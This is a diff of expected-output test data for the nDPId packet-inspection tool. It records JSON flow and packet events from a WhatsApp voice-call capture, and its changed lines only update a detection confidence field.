00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1561455707474,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1561455707474,"pkt":"xiwDYGpkkLkxKPrKCABFAABAAABAAEAGxd\/AqAIMnfAUNMVIAbt68MpNAAAAALDC\/\/823wAAAgQFtAEDAwcBAQgKNM5JcwAAAAAEAgAA"} 
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1561455707511,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1561455707511,"pkt":"kLkxKPrKxiwDYGpkCABFAAA8AAAAAFMG8uOd8BQ0wKgCDAG7xUi7sKeEevDKTqASbHBlBQAAAgQFeAQCCAq1oF6CNM5JcwEDAwg="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":250,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1561455707513,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1561455707513,"pkt":"xiwDYGpkkLkxKPrKCABFAAA0AABAAEAGxevAqAIMnfAUNMVIAbt68MpOu7CnhYAQBAb72QAAAQEICjTOSZq1oF6C"} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":251,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1561455707474,"flow_last_seen":1561455707524,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1561455707524,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.52","src_port":50504,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsApp","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pps.whatsapp.net","ja3":"7a7a639628f0fe5c7e057628a5bbec5a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00994{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":253,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1561455707474,"flow_last_seen":1561455707564,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1561455707564,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.52","src_port":50504,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsApp","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.3","client_requested_server_name":"pps.whatsapp.net","ja3":"7a7a639628f0fe5c7e057628a5bbec5a","ja3s":"475c9302dc42b2751db9edcac3b74891","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":251,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1561455707474,"flow_last_seen":1561455707524,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1561455707524,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.52","src_port":50504,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WhatsApp","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pps.whatsapp.net","ja3":"7a7a639628f0fe5c7e057628a5bbec5a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00994{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":253,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1561455707474,"flow_last_seen":1561455707564,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1561455707564,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.52","src_port":50504,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WhatsApp","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.3","client_requested_server_name":"pps.whatsapp.net","ja3":"7a7a639628f0fe5c7e057628a5bbec5a","ja3s":"475c9302dc42b2751db9edcac3b74891","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1561455709888,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1561455709888,"pkt":"AQBeAAD7kLkxKPrKCABFAABNP9UAAP8R2BrAqAIM4AAA+xTpFOkAOUTGAAAAAAACAAAAAAAABV9yYW9wBF90Y3AFbG9jYWwAAAwAAQhfYWlycGxhecASAAwAAQ=="} 
00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1561455709890,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":111,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":111,"pkt_l4_len":57,"thread_ts_msec":1561455709890,"pkt":"MzMAAAD7kLkxKPrKht1gDagnADkR\/\/6AAAAAAAAABBRAnYr9nwX\/AgAAAAAAAAAAAAAAAAD7FOkU6QA5e0MAAAAAAAIAAAAAAAAFX3Jhb3AEX3RjcAVsb2NhbAAADAABCF9haXJwbGF5wBIADAAB"} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":349,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1561455709984,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"thread_ts_msec":1561455709984,"pkt":"AQBef\/\/6kLkxKPrKCABFAACggMsAAAIRhNPAqAIM7\/\/\/+vzMB2wAjOY9TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpzZXJ2aWNlOldBTklQQ29ubmVjdGlvbjoxDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KTVg6IDMNCg0K"} 00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1561455713015,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1561455713015,"pkt":"AQBef\/\/6kLkxKPrKCABFAAChffAAAAIRh63AqAIM7\/\/\/+vzMB2wAjYZETS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpzZXJ2aWNlOldBTlBQUENvbm5lY3Rpb246MQ0KTUFOOiAic3NkcDpkaXNjb3ZlciINCk1YOiAzDQoNCg=="} 
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":427,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455721320,"flow_last_seen":1561455721320,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1561455721320,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00852{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1561455721320,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1561455721320,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFInqQAAP8RHAEAAAAA\/\/\/\/\/wBEAEMBNNuDAQEGAH5K8tcAAAAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"} -00735{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455721320,"flow_last_seen":1561455721320,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1561455721320,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,121,3,6,15,119,252,95,44,46","class_ident":""}} +00735{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455721320,"flow_last_seen":1561455721320,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1561455721320,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,121,3,6,15,119,252,95,44,46","class_ident":""}} 00852{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1561455722541,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1561455722541,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFInqUAAP8RHAAAAAAA\/\/\/\/\/wBEAEMBNNuCAQEGAH5K8tcAAQAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"} 
00853{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":431,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1561455724934,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1561455724934,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFInqYAAP8RG\/8AAAAA\/\/\/\/\/wBEAEMBNNuAAQEGAH5K8tcAAwAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1561455726442,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455726442,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABIUlcAAEARof3AqAIBwKgC\/+EV4RUANEtUU3BvdFVkcDC64ScQKi2g\/wABAARIlcIDyUSzc\/3fJAksKuG26pMF0apN5Ek="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":465,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455730495,"flow_last_seen":1561455730495,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455730495,"l3_proto":"ip4","src_ip":"91.252.56.51","dst_ip":"192.168.2.12","src_port":32704,"dst_port":56328,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1561455730495,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455730495,"pkt":"kLkxKPrKxiwDYGpkCABFAABI7nAAADERRFFb\/DgzwKgCDH\/A3AgANOnLAAEAGCESpEJZi1FU1SmRVkxGZgQACAAUYCmYSN+rkyNYVIx9I16CdotJWKc="} -00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455730495,"flow_last_seen":1561455730495,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455730495,"l3_proto":"ip4","src_ip":"91.252.56.51","dst_ip":"192.168.2.12","src_port":32704,"dst_port":56328,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455730495,"flow_last_seen":1561455730495,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455730495,"l3_proto":"ip4","src_ip":"91.252.56.51","dst_ip":"192.168.2.12","src_port":32704,"dst_port":56328,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1561455731073,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455731073,"pkt":"kLkxKPrKxiwDYGpkCABFAABIAlEAADERMHFb\/DgzwKgCDH\/A3AgANGApAAEAGCESpELobM0y9AHrYlN0+hgACAAU\/c20Lcr5wjE5JYKvJct9qbua6og="} 00902{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1561455731356,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":383,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":383,"pkt_l4_len":349,"thread_ts_msec":1561455731356,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAFxjdoAAEARZVHAqAIBwKgC\/0RcRFwBXbU+eyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiAxNzQ1NjcxOTM5MjIwMTQ2OTg4Njg4NzAzNTEyMjAyNTg3OTI0NDMsICJkaXNwbGF5bmFtZSI6ICIiLCAibmFtZXNwYWNlcyI6IFsyNzUwMzcwNTYwLCA3ODUyNjYxNzcsIDE1MjYyNjMwNDUsIDEzMzg2NTkyMDEsIDE0ODE5MzM3LCA0ODA5NDIwMDQ4LCA1MTE3MDY2NDIsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA0ODEwNTkxNzYwLCA1ODM0NDk5NiwgOTk2MzA2MjE1LCA1MzAzMzAxMjQ4LCAzMDc1NTIxNjk2LCA0MDU2NDYyNTkyLCAyOTYzNjgyMDk2LCAxNTIyMTc3NTg3XX0="} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":501,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455731665,"flow_last_seen":1561455731665,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455731665,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"1.60.78.64","src_port":56328,"dst_port":64282,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":501,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1561455731665,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455731665,"pkt":"xiwDYGpkkLkxKPrKCABFAABId7IAAEAR8MLAqAIMATxOQNwI+xoANL93AAEAGCESpEJNNg9OA5IbZKhKGmoACAAUkUJIDnID0ka3i4LpQfhGRUa3K\/w="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":501,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455731665,"flow_last_seen":1561455731665,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455731665,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"1.60.78.64","src_port":56328,"dst_port":64282,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":501,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455731665,"flow_last_seen":1561455731665,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455731665,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"1.60.78.64","src_port":56328,"dst_port":64282,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":503,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1561455731697,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455731697,"pkt":"kLkxKPrKxiwDYGpkCABFAABI\/gUAADERNLxb\/DgzwKgCDH\/A3AgANISZAAEAGCESpEKSaahiiU3KFyQDpDgACAAUPvQQqrwwB3kMX1876e4ssz8N17Y="} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1561455732298,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455732298,"pkt":"xiwDYGpkkLkxKPrKCABFAABIre0AAEARuofAqAIMATxOQNwI+xoANHLOAAEAGCESpEIrgAUzrwTeBSrSSH8ACAAUv8Ev3sei+dcRfEZy9ei0mRui3Zw="} 
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":528,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1561455732919,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455732919,"pkt":"xiwDYGpkkLkxKPrKCABFAABIV+kAAEAREIzAqAIMATxOQNwI+xoANBvDAAEAGCESpELCs7YUVt8QVzF73yEACAAUMmINwHB46SKyj3xrODHnuD6GHSA="} -00690{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":632,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1561455705874,"flow_last_seen":1561455737893,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1561455737893,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}} -00699{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":633,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1561455705874,"flow_last_seen":1561455737895,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1561455737895,"l3_proto":"ip6","src_ip":"fe80::414:409d:8afd:9f05","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}} 
+00690{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":632,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1561455705874,"flow_last_seen":1561455737893,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1561455737893,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}} +00699{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":633,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1561455705874,"flow_last_seen":1561455737895,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1561455737895,"l3_proto":"ip6","src_ip":"fe80::414:409d:8afd:9f05","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":640,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455738163,"flow_last_seen":1561455738163,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1561455738163,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"169.254.162.244","src_port":49352,"dst_port":49159,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
